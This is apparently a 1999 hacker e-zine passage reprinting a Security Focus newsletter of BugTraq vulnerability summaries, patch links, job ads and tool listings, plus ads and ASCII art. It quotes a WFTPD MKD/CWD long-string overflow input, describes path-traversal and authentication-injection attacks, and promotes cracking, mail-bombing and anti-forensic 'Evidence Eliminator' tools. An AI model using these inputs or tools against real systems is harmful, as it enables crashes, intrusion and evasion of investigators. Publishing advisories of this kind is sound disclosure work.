4. Vulnerability Patched: Debian, Redhat, SuSE NIS Vulnerabilties
IV. INCIDENTS SUMMARY
1. Repeated FTP Connections (Thread)
2. Re: Default Trojan Port list (Thread)
3. SMB Port scanning (Thread)
4. Re: More Log Sharing (Thread)
5. Re: ICP (Internet Cache Protocol) problems... (Thread)
V. VULN-DEV RESEARCH LIST SUMMARY
1. Re: IE 5.0 vulnerability (Thread)
2. Re: possible gnome remote overflow (Thread)
3. Re: Need help cracking wwwboard passwd.txt (Thread)
4. ICQ 2000 (Thread)
5. Re: forged packets? (Thread)
6. Accessing IE/Netscape incomming data (Thread)
7. linux userland ip spoofing vulnerability (Thread)
8. FreeBSD listen()
9. stealth executables
10. AIM 3.0
11. Possibly exploitable overflow in Alibaba 2.0
VI. SECURITY JOBS
Discussion:
1. IT security salary question (Thread)
Seeking Staff:
1. Infrastructure Security Architect - DC Area
2. Information Security Consultant(s) - NY #111
3. Security Awareness Specialist - NY #215
VII. SECURITY SURVEY RESULTS
VIII. SECURITY FOCUS TOP 6 TOOLS
1. Security Focus Pager (NT/98)
2. ShadowScan (NT/98)
3. East-Tec Eraser (NT/98)
4. Evidence Eliminator (NT/98)
5. Access Sentinel 3.0 (NT/98)
6. Alot MoniCA 1.1 (NT/98)
IX. SPONSOR INFORMATION - NT OBJECTives, Inc.
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
I. INTRODUCTION
-----------------
Welcome to the Security Focus 'week in review' newsletter issue 13
sponsored by NT OBJECTives, Inc. <http://www.ntobjectives.com>. To start
this this newsletter we would like to introduce you to our newest addition
to the Security Focus team, Eric Schultze.
Eric Schultze is the new Director of Microsoft Content for Security Focus
Inc. Eric has been deploying, assessing, and securing Microsoft products
for the last 6 years, working first as a Network Administrator for a
retail organization, and later as a security professional for both Price
Waterhouse and Ernst & Young. Eric was a co-founder of the highly popular
"Extreme Hacking: Defending Your Site" course and is a popular speaker at
security events including Blackhat, CSI, and various international
conferences. He is a contributing author to "Hacking Exposed: Network
Security Secrets and Solutions" and is frequently quoted in the press,
including TIME Magazine, Infoworld, and ComputerWorld.
II. BUGTRAQ SUMMARY 1999-10-24 to 199-11-01
---------------------------------------------
1. Pacific Software URL Live! Directory Traversal Vulnerability
BugTraq ID: 746
Remote: Yes
Date Published: 1999-10-28
Relevant URL:
http://www.securityfocus.com/bid/746
Summary:
The URL Live! free webserver from Pacific software is susceptible to the
"../" directosy traversal vulnerability. By using the '../' string in a
URL, an attacker can gain read access to files outside the intended web
file structure.
2. Squid Web Proxy Authentication Failure Vulnerability
BugTraq ID: 741
Remote: Yes
Date Published: 1999-10-25
Relevant URL:
http://www.securityfocus.com/bid/741
Summary:
There is a vulnerability present in certain versions of the Squid Web
Proxy Cache developed by the National Science Foundation. This problem is
only in effect when users of the cache are using an external
authenticator.
The following is quoted from the original Bugtraq posting on this issue,
this message in it's entirety is available in the 'Credits' section of
this vulnerability.
"After decoding the base64 encoded "user:password" pair given by the
client, squid doesn't strip out any '\n' or '\r' found in the resulting
string. Given such a string, any external authenticator will receive two
lines instead of one, and most probably send two results. Now, any
subsequent authentication exchange will has its answer shifted by one.
Therefore, a malicious user can gain access to sites he or she should not
have access to."
3. Zeus Webserver Possible Remote root Compromise
BugTraq ID: 742
Remote: Yes
Date Published: 1999-10-25
Relevant URL:
http://www.securityfocus.com/bid/742
Summary:
There are a number of vulnerabilities in the Zeus Web Server, that if
carried out in combination can lead to a remote root compromise.The Zeus
Web Server gives its users the option to use a pre-built search CGI
program for their virtual website. The program accepts (as its http form
variables) server filesystem paths as its arguments. Because of this, it
is possible to display any file that the server has access to. Thus, by
altering parameters to "search", an attacker can obtain the password hash
for the admin user by displaying the configuration file.
Once a password for the admin user is cracked, it is possible to execute
aribtrary commands through the web based configuration UI as root (which
the configuration UI runs as).
4. Falcon Web Server Directory Traversal Vulnerability
BugTraq ID: 743
Remote: Yes
Date Published: 1999-10-26
Relevant URL:
http://www.securityfocus.com/bid/743
Summary:
The Falcon Webserver is a personal desktop webserver designed for low
volume page serving. Certain versions of this software do not properly
handle user supplied URL's. Therefore a user can browse outside of the web
browser 'root' directory at any file on the file system depending on
permissions.
A second problem exists wherein a longer than expected URL will elicit an
error message from the server which betrays the location of the 'root'
directory.
5. AIX Filtering Vulnerability
BugTraq ID: 744
Remote: Yes
Date Published: 1999-10-26
Relevant URL:
http://www.securityfocus.com/bid/744
Summary:
The filtering modules for AIX 4.3.2 do not allow you to filter tcp port
numbers higher than 32767. This example was in the BugTraq posting
regarding this problem:
genfilt -v 4 -a D -s 0.0.0.0 -m 0.0.0.0 -d 0.0.0.0 -M 0.0.0.0 \ -c udp -o any -O eq -P 123 -l n -w I -i all
Works fine... but...
genfilt -v 4 -a D -s 0.0.0.0 -m 0.0.0.0 -d 0.0.0.0 -M 0.0.0.0 -c udp \ -o any -O eq -P 32768 -l n -w I -i all
Fails with: Bad destination port/ICMP type "32768".
It is believed that this problem is a result of incorrect type (short int)
being used for the port number argument. Compromise may occur through
services listening on ports that are higher than 32767.
6. MacOS 9 Console Lock Bypass Vulnerability
BugTraq ID: 745
Remote: No
Date Published: 1999-10-26
Relevant URL:
http://www.securityfocus.com/bid/745
Summary:
MacOS 9 includes an idle-activated console lock feature, similar to a
screensaver password in other operating systems. After a certain length of
user inactivity, a dialog box appears stating that a password must be
entered. After the user clicks 'OK' another dialog box appears offering
the option to either supply a password or to log out the current user. If
the 'log out' option is chosen, any programs running will start to shut
down. In certain programs, dialog boxes are created in the shutdown
process (for example, "Exit without saving? OK/Cancel"). If the user
selects 'Cancel', the shutdown process is aborted and the user is returned
to the current session without ever having to enter a password.
7. WFTPD Remote Buffer Overflow Vulnerability
BugTraq ID: 747
Remote: Yes
Date Published: 1999-10-28
Relevant URL:
http://www.securityfocus.com/bid/747
Summary:
There is a remotely exploitable buffer overflow vulnerability in WFTPD
that is known to affect versions 2.34 and 2.40. The overflow exists in the
MKD and CWD commands, which if argumented with long strings in the right
order, can overrun the buffer and allow for aribtrary code execution on
the target host.
This is from the BugTraq posting:
First command
MKD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
Second command
CWD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
Crash.....Overflow.
8. Netscape Messaging Server RCPT TO DoS Vulnerability
BugTraq ID: 748
Remote: Yes
Date Published: 1999-10-29
Relevant URL:
http://www.securityfocus.com/bid/748
Summary:
Netscape Messaging server will not de-allocate memory that is used to
store the RCPT TO information for an incoming email. By sending enough
long RCPT TO addresses, the system can be forced to consume all available
memory, leading to a denial of service.
9. Celtech ExpressFS USER Buffer Overflow Vulnerability
BugTraq ID: 749
Remote: Yes
Date Published: 1999-10-29
Relevant URL:
http://www.securityfocus.com/bid/749
Summary:
Celtech's ExpressFS FTP server has been found to be vulnerable by means of
a buffer overflow. If an argument of sufficient length is passed after the
USER command, the next command sent will cause it to crash.
10. NT Services Denial of Service
BugTraq ID: 754
Remote: Yes
Date Published: 1999-10-31
Relevant URL:
http://www.securityfocus.com/bid/754
Summary:
A specially crafted packet can cause a denial of service in on an NT 4.0
host, rendering local administration and network communication next to
useless. This attack will crash the "services" executable, which in turn,
disables the ability for the machine to perform actions via 'named pipes'.
As a consequence, users will be unable to remotely logon, logoff, manage
the registry, create new file share connections, or perform remote
administration. Services such as Internet Information Server may also fail
to operate as expected.
The problem lies within the manner that srvsvc.dll makes calls to
services.exe. Certain MSRPC calls will return NULL values which are not
correctly interpreted by services.exe. This, in turn, may lead to a crash
of Services.exe.
If this denial of service is combined with a number of other exploits, it
may be possible to have this attack spawn a Debugger (ie Dr Watson) call
on the host, which, if trojaned, may execute malicious code on the target
host.
11. FreeBSD Amanda 'amandad' Symlink Vulnerability
BugTraq ID: 752
Remote: No
Date Published: 1999-11-01
Relevant URL:
http://www.securityfocus.com/bid/752
Summary:
Amanda is a popular file backup system used by several free UNIX
distributions. Under certain versions of the distribution shipped with
FreeBSD 3.3-RELEASE the amanda daemon itself (amandad) is subject to a
symlink vulnerability which could result in a denial of service attack.
This is caused because amandad during it's process of operations writes a
debug file to the /tmp directory. This file (/tmp/amandad.debug) does not
check for existing symlinked files of the same name. Amandad is not run
SUID/SGID so the end result of this vulnerability would most likely be the
ability to clobber other files owned by the UID which owns the amandad
process. The output in this case cannot be tailored and consists of Amanda
debug output.
12. Multiple Vendor Linux NIS Vulnerabilities
BugTraq ID: 753
Remote: Yes
Date Published: 1999-11-01
Relevant URL:
http://www.securityfocus.com/bid/753
Summary:
ypserv releases previous to 1.3.9 contain two different vulnerabilties:
Any NIS domain administrator can inject password tables, and users can
modify the GECOS field and login shell values for other users. Also,
rpc.yppasswd prior 1.3.6.92 has a standard buffer overflow problem in the
md5 hash generation code.
13. aVirt Mail Server Buffer Overflow
BugTraq ID: 755
Remote: Unknown
Date Published: 1999-10-31
Relevant URL:
http://www.securityfocus.com/bid/755
Summary:
The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote
buffer overflow vulnerability. The buffer overflow can be initiated by
passing 856 characters in the password field.
III. PATCH UPDATES 1999-10-24 to 199-11-01
-------------------------------------------
1. Vendor: Zeus
Product: Zeus Webserver
Patch Location:
http://support.zeus.co.uk/news/exploit.html
Vulnerability Patched: Zeus Webserver Possible Remote root Compromise
BugTraq ID: 742
Relevant URLS:
http://www.securityfocus.com/bid/742
2. Vendor: National Science Foundation
Product: Squid Web Proxy
Patch Location:
http://squid.nlanr.net/Versions/v2/2.2/bugs/squid-2.2.stable5-newlines_in_auth.patch
Vulnerability Patched: Squid Web Proxy Authentication Failure
Vulnerability
BugTraq ID: 741
Relevant URLS:
http://www.securityfocus.com/bid/741
http://squid.nlanr.net/Doc/Users-Guide/
http://squid.nlanr.net/
3. Vendor: Blueface Software
Product: Falcon Webserver
Patch Location:
http://www.blueface.com/products.html#fws
Vulnerability Patched: Falcon Web Server Directory Traversal Vulnerability
BugTraq ID: 743
Relevant URLS:
http://www.securityfocus.com/bid/743
4. Vendor: Debian, Redhat, SuSE
Product: ypserv/NIS package
Patch Location:
-RedHat patches:
Red Hat Linux 4.x:
ftp://updates.redhat.com/4.2/i386/ypserv-1.3.9-0.4.2.i386.rpm
ftp://updates.redhat.com/4.2/alpha/ypserv-1.3.9-0.4.2.alpha.rpm
ftp://updates.redhat.com/4.2/sparc/ypserv-1.3.9-0.4.2.sparc.rpm
ftp://updates.redhat.com/4.2/SRPMS/ypserv-1.3.9-0.4.2.src.rpm
Red Hat Linux 5.x:
ftp://updates.redhat.com/5.2/i386/ypserv-1.3.9-0.5.2.i386.rpm
ftp://updates.redhat.com/5.2/alpha/ypserv-1.3.9-0.5.2.alpha.rpm
ftp://updates.redhat.com/5.2/sparc/ypserv-1.3.9-0.5.2.sparc.rpm
ftp://updates.redhat.com/5.2/SRPMS/ypserv-1.3.9-0.5.2.src.rpm
Red Hat Linux 6.x:
ftp://updates.redhat.com/6.1/i386/ypserv-1.3.9-1.i386.rpm
ftp://updates.redhat.com/6.0/alpha/ypserv-1.3.9-1.alpha.rpm
ftp://updates.redhat.com/6.0/sparc/ypserv-1.3.9-1.sparc.rpm
ftp://updates.redhat.com/6.1/SRPMS/ypserv-1.3.9-1.src.rpm
-SuSE patches:
ftp://ftp.suse.com/pub/suse/i386/update/6.1/n1/ypserv-1.3.9-0.i386.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/n1/ypserv-1.3.9-0.alpha.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/n1/ypserv-1.3.9-0.i386.rpm
-Debian patches:
Source archives:
http://security.debian.org/dists/stable/updates/source/nis_3.5-2.diff.gz
http://security.debian.org/dists/stable/updates/source/nis_3.5-2.dsc
http://security.debian.org/dists/stable/updates/source/nis_3.5.orig.tar.gz
Architecture-specific binaries:
http://security.debian.org/dists/stable/updates/binary-alpha/nis_3.5-2_alpha.deb
http://security.debian.org/dists/stable/updates/binary-i386/nis_3.5-2_i386.deb
http://security.debian.org/dists/stable/updates/binary-m68k/nis_3.5-2_m68k.deb
http://security.debian.org/dists/stable/updates/binary-sparc/nis_3.5-2_sparc.deb
These files will be moved into
ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.
For not yet released architectures please refer to the appropriate
directory
ftp://ftp.debian.org/debian/dists/sid/binary-$arch/.
Vulnerability Patched: Linux NIS Vulnerabilities
BugTraq ID: 753
Relevant URLS:
http://www.securityfocus.com/bid/753
INCIDENTS SUMMARY 1999-10-24 to 199-11-01
------------------------------------------
1. Repeated FTP Connections (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=Pine.LNX.4.10.9910251654160.20244-100000@ns.doomsday.com
2. Re: Default Trojan Port list (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=19991025150329.55777.qmail@hotmail.com
3. SMB Port scanning (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=19991026132728267.AAA391@paragon3.paragontech.com@dennisdcomp
4. Re: More Log Sharing (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=3816096E.F75578CA@cert.org
5. Re: ICP (Internet Cache Protocol) problems... (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=Pine.LNX.4.10.9910280257540.492-100000@mad.unix.kg
V. VULN-DEV RESEARCH LIST SUMMARY 1999-10-24 to 199-11-01
----------------------------------------------------------
1. Re: IE 5.0 vulnerability (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=000201bf1e48$65a2cd30$021d85d1@youwant.to
2. Re: possible gnome remote overflow (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=38135F5B.3A2B2369@cse.ogi.edu
3. Re: Need help cracking wwwboard passwd.txt (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=199910240555.PAA28579@rockhampton-psvr.qld.hotkey.net.au
4. ICQ 2000 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=19991025114035.J5069@securityfocus.com
5. Re: forged packets? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=001a01bf1f1c$86c8dfc0$021d85d1@youwant.to
6. Accessing IE/Netscape incomming data (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=2321.991026@infinet.com
7. linux userland ip spoofing vulnerability (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=Pine.LNX.4.10.9910270708380.638-200000@yahoo.com
8. FreeBSD listen()
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=3701.991027@SECURITY.NNOV.RU
9. stealth executables
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=199910270223.MAA09528@rockhampton-psvr.qld.hotkey.net.au
10. AIM 3.0
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=19991028172023.18236.qmail@securityfocus.com
11. Possibly exploitable overflow in Alibaba 2.0
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=199910281536.RAA18018@mail1.cityweb.de
VI. SECURITY JOBS SUMMARY 1999-10-24 to 199-11-01
---------------------------------------------------
Discussion:
1. IT security salary question (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=CB64F884F39FD2118EC600A024E6522C7F5483@wfhqex05.wangfed.com
Seeking Staff:
1. Infrastructure Security Architect - DC Area
Reply to: Steve Goldsby <sgoldsby@integrate-u.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-15&msg=NCBBLNPMHFBGKOMJOGILKEOGFAAA.sgoldsby@integrate-u.com
1. Security Position Waanted in NJ or NYC
Reply to: Gould, Beau - <beau@nyc-search.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=3816170C.919BAEEA@nyc-search.com
2. Information Security Consultant(s) - NY #111
Reply to: Lori Sabat - <lori@altaassociates.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=19991027151154.337.qmail@securityfocus.com
3. Security Awareness Specialist - NY #215
Reply to: Lori Sabat - <lori@altaassociates.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=19991027152336.504.qmail@securityfocus.com
VII. SECURITY SURVEY 1999-10-24 to 199-11-01
----------------------------------------------
The question for 1999-10-24 to 199-11-01 was:
"What do you think the primary motivator for recent vendor initiatives in security are?"
Results:
1. They're genuinely concerned about security. 1% / 1 votes
2. They want good press. 1% / 1 votes
3. They want to avoid bad press, by being able to claim they're at least trying. 47% / 33 votes
4. Security is buzzword compliant. 43% / 30 votes
Total number of votes: 69 votes
VIII. SECURITY FOCUS TOP 6 TOOLS 1999-10-24 to 199-11-01
--------------------------------------------------------
1. Security Focus Pager
by Security Focus
Relevant URL:
http://www.securityfocus.com/pager
This program allows the user to monitor additions to the Security Focus
website without constantly
maintaining an open browser. Sitting quietly in the background, it polls
the website at a user-specified interval and alerts the user via a
blinking icon in the system tray, a popup message or both (also
user-configurable).
2. ShadowScan
by RedShadow
Relevant URL:
http://www.securityfocus.com/data/tools/auditing/ShadowScan.zip
Shadow Advantis Administrator Tools - Ping (SSPing), Port Scanner, , IP
Scaner, Site Info (is intended for fast definition of services started on
the host), Network Port Scaner,Tracert, Telnet,Nslookup,
Finger,Echo,Time,UPD test,File Info, Compare File, Netstat, SysInfo,Crypt,
Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info
Shadow Hack and Crack - WinNuke, Mail Bomber, POP3, HTTP, SOCKS, FTP Crack
(definitions of the password by a method of search),Unix password Crack,
Finger over SendMail, Buffer Overlow , Smb Password Check , CRK Files
ShadowPortGuard - code for detection of connection on the certain port
Shadow Novell NetWare Crack - code for breaking Novell NetWare 4.x And
more other functions...
3. East-Tec Eraser
by EAST Technologies
Relevant URL:
http://www.securityfocus.com/data/tools/eerase20.zip
East-Tec Eraser is an advanced security application designed to completely
eliminate sensitive data from your computer. East-Tec Eraser works on
Windows 98/95 and Windows NT. Eraser introduces a new meaning for the verb
TO ERASE. Erasing a file now means wiping its contents beyond recovery,
scrambling its name and dates and finally removing it from disk. When you
want to get rid of sensitive files or folders beyond recovery, add them to
the Eraser list of doomed files and ask Eraser to do the job. Eraser
offers tight integration with the Windows shell, so you can drag files and
folders from Explorer and drop them in Eraser, or you can erase them
directly from Explorer by selecting "Erase beyond recovery" from the
context menu.
4. Evidence Eliminator
by ESoft(UK)
Relevant URL:
http://www.securityfocus.com/data/tools/eelm202.zip
This security tool eliminates all evidence from your PC in one single
click of a button. In tests, Evidence Eliminator defeats "Forensic
Analysis" software as used by investigators, law-enforcement etc.
5. Access Sentinel 3.0
by Sentinel@XProc.com
Relevant URL:
http://www.securityfocus.com/data/tools/accsntl.zip
Protect your Win95/98 files and folders with this kernel-mode operating
system security extension. Tightly integrated with the Windows Shell,
Sentinel allows you to hide, monitor, and block access to files and
folders using nothing more than the Windows Explorer File Properties
dialog. Also allows you to watch in realtime all activity on your
harddrive. Designed for ease-of-use and minimal fuss.
6. Alot MoniCA 1.1
by Alot Enterprises
Relevant URL:
http://www.securityfocus.com/data/tools/amnset11.zip
MoniCA is a Client Application Monitor. Why use MoniCA? You can use MoniCA
when you want to know, Who, when and what were doing on your standalone
and network computers. How long a particular program was running;. When
your office computers were used not for business. What your family was
doing when you were not at home. Who was reading your own documents. How
to optimize computer usage in your office according to statistics. MoniCA
can operate on local network and on a standalone computer as well.
IX. SPONSOR INFORMATION -
------------------------------------------
URL: http://www.ntobjectives.com
NT OBJECTives, Inc. is a small company dedicated to building network security tools for
the Windows NT platform. Our current line of tools is directed at security forensics.
We base our designs around fast, visually intuitive interfaces with a sharp focus on
making security analysis easy. This is the foundation of our tool line. Our goal is for
each of our successive product builds to enhance previous capabilities so that you have
a comprehensive set of tools at your disposal. We keep abreast of current trends, tools,
and issues, so that we can bring you quality network tools
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------
1. How do I subscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of:
SUBSCRIBE SF-NEWS Lastname, Firstname
You will receive a confirmation request message to which you will have to anwser.
2. How do I unsubscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address
with a message body of:
UNSUBSCRIBE SF-NEWS
If your email address has changed email aleph1@securityfocus.com and I will manualy remove
you.
3. How do I disable mail delivery temporarily?
If you will are simply going in vacation you can turn off mail delivery without unsubscribing by
sending LISTSERV the command:
SET SF-NEWS NOMAIL
To turn back on e-mail delivery use the command:
SET SF-NEWS MAIL
4. Is the list available in a digest format?
Yes. The digest generated once a day.
5. How do I subscribe to the digest?
To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to
LISTSERV@SECURITYFOCUS.COM with with a message body of:
SET SF-NEWS DIGEST
6. How do I unsubscribe from the digest?
To turn the digest off send a message to LISTSERV with a message body of:
SET SF-NEWS NODIGEST
If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next.
7. I seem to not be able to unsubscribe. What is going on?
You are probably subscribed from a different address than that from which you are sending
commands to LISTSERV from. Either send email from the appropiate address or email the
moderator to be unsubscribed manually.
Alfred Huger
VP of Operations
Security Focus
@HWA
-=----------=- -=----------=- -=----------=- -=----------=-
0
0
0
o
O O O
0
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
HWA.hax0r.news
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
When people ask you "Who is Kevin Mitnick?" do you have an answer?
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
http://www.2600.com/ http://www.kevinmitnick.com
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* http://www.csoft.net" One of our sponsers, visit them now www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
// or cruciphux@dok.org //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...<sic>
So, you want a puzzle do you? well crack the 'code' at the beginning and end of
the newsletter only one person has done it so far, so go ahead get your crypto
sk1llz out and try cracking it. its easy!
____ _ _ _ _ _
/ ___| ___ _ __ __| (_)_ __ _ _ ___ _ _ _ __ / \ ___ ___(_|_)
\___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | |
___) | __/ | | | (_| | | | | | |_| | (_) | |_| | | / ___ \\__ \ (__| | |
|____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_| /_/ \_\___/\___|_|_|
|___/
/ \ _ __| |_
/ _ \ | '__| __|
/ ___ \| | | |_
/_/ \_\_| \__| TOO, for inclusion in future issues
Do the HWA logo etc and we'll showcase it here to show off your talents...remember
the 80's? dig out those ascii editors and do yer best...
_|
_|_|_| _|_| _|_|_|_|
_| _| _| _| _|
_| _| _| _| _|
_|_|_| _|_| _|_|
_|
_|_|
_| _|_|
_| _|_| _|_| _|_| _|_|_|_| _|
_|_| _| _| _| _| _| _|_|
_| _| _| _| _| _|
_| _|_| _|_| _|_| _|
_________________________
/| /| | |
||__|| | HAX0R FOR HIRE ... |
/ O O\__ WILL HACK FOR |
/ \ BACK ISSUES OF 2600 |
/ \ \ |
/ _ \ \ ---------------------
/ |\____\ \ ||
/ | | | |\____/ ||
/ \|_|_|/ | __||
/ / \ |____| ||
/ | | /| | --|
| | |// |____ --|
* _ | |_|_|_| | \-/
*-- _--\ _ \ // |
/ _ \\ _ // | /
* / \_ /- | - | |
* ___ c_c_c_C/ \C_c_c_c____________ _________
(Ascii art from V0iD magazine #7)
Croatian Poetry contributed by ch4
Panta rei ?!
Noge od perja,
Brzopleto plutaju po snjegu,
Dok leptir puzi po uraganu.
Krvav val,
Stidnjivo brise zvijezde,
A ohar lomi kosti lava.
Izgoren list,
Guta izmet robota,
Da bi kitu krali rogove.
By sime
-=-
Contributed by FProphet
Found this while trolling the net, check out some other words on the engine, its quite funny.
http://www.dictionary.com/cgi-bin/dict.pl?term=warez%20d00dz
warez d00dz /weirz doodz/ /n./ A substantial subculture of crackers refer to themselves as `warez
d00dz'; there is evidently some connection with B1FF here. As `Ozone Pilot', one former warez d00d,
wrote:
Warez d00dz get illegal copies of copyrighted software. If it has copy protection on it, they break the
protection so the software can be copied. Then they distribute it around the world via several
gateways. Warez d00dz form badass group names like RAZOR and the like. They put up boards that
distribute the latest ware, or pirate program. The whole point of the Warez sub-culture is to get the
pirate program released and distributed before any other group. I know, I know. But don't ask, and it
won't hurt as much. This is how they prove their poweress [sic]. It gives them the right to say, "I
released King's Quest IVXIX before you so obviously my testicles are larger." Again don't ask...
The studly thing to do if one is a warez d00d, it appears, is emit `0-day warez', that is copies of
commercial software copied and cracked on the same day as its retail release. Warez d00ds also
hoard software in a big way, collecting untold megabytes of arcade-style games, pornographic GIFs,
and applications they'll never use onto their hard disks. As Ozone Pilot acutely observes:
[BELONG] is the only word you will need to know. Warez d00dz want to belong. They have been
shunned by everyone, and thus turn to cyberspace for acceptance. That is why they always start groups
like TGW, FLT, USA and the like. Structure makes them happy. [...] Warez d00dz will never have a
handle like "Pink Daisy" because warez d00dz are insecure. Only someone who is very secure with a
good dose of self-esteem can stand up to the cries of fag and girlie-man. More likely you will find
warez d00dz with handles like: Doctor Death, Deranged Lunatic, Hellraiser, Mad Prince, Dreamdevil,
The Unknown, Renegade Chemist, Terminator, and Twin Turbo. They like to sound badass when they
can hide behind their terminals. More likely, if you were given a sample of 100 people, the person
whose handle is Hellraiser is the last person you'd associate with the name.
The contrast with Internet hackers is stark and instructive. See cracker, wannabee, handle, elite;
compare weenie, spod.
@HWA
SITE.1
You can Send in submissions for this section too if you've found
(or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
___| _ \ |
| __| _` |\ \ / | | __| _ \ _` |
| | ( | ` < | | | __/ ( |
\____|_| \__,_| _/\_\\___/ _| \___|\__,_|
